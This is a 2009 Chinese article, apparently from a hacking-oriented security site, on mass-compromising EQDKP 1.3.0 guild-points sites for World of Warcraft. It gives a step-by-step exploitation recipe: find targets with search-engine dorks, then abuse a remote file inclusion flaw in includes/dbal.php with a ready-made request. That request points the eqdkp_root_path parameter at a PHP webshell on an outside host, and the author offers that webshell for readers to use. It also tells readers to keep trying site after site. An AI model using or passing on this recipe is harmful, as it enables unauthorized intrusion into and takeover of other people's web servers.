首页 网络安全 安全学院 查看内容

DKP魔兽站批量入侵得到WEBSEHLL

2009-2-4 11:28 622 0

摘要: DKP是屠龙积分的缩写。现在有一种系统叫做EQDKP的,是开源,用于WOW,在其1.3.0下有个严重的远程文件包含漏洞,体现在其对DBAL.PHP中对于用户提交的EQDKP_ ROOT_PA...
关键词: PHP EQDKP nbsp 漏洞 文件包 WEBSHLL 如果 现在 一个 系统

DKP是屠龙积分的缩写。现在有一种系统叫做EQDKP的,是开源,用于WOW,在其1.3.0下有个严重的远程文件包含漏洞,体现在其对DBAL.PHP中对于用户提交的EQDKP_ ROOT_PATH参数缺少过滤所至。如果指定的远程服务器上任意对象做为其包含对象,哪么就麻烦了,可以导致以WEB权限执行任意PHP代码。比如:我包含的是一个PHP的WEBSHLL,哪么就执行吧,哈哈。现在这种包含漏洞在国外很红火,国内也开始了,前不久出现的几个漏洞都与其有关。以下是使用方法:利用GOOGLE或百度找DKP系统,关键字可以是POWER BY EQDKP 然后在你的空间中传个PHP的WEBSHELL,后缀为TXT找到DKP系统的站点后,在其网站目录后提交以下语句:includes/dbal.php?eqdkp_root_path=http://bbs.cnhacker.cn/php.txt?这是我放在BBS服务器上的一个PHP的WEBSHLL,如果大家没有空间放PHP的WEBSHLL,可以用我这个。意思就是说,把php.txt放到了INCLUDES目录下的DBAL.PHP的EQDKP_ ROOT_PATH参数中并加以执行。成功后会直接返回你的WEBSHELL的页面,如果有其它错误提示或是文件没有找到就换下一个网站试试吧。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部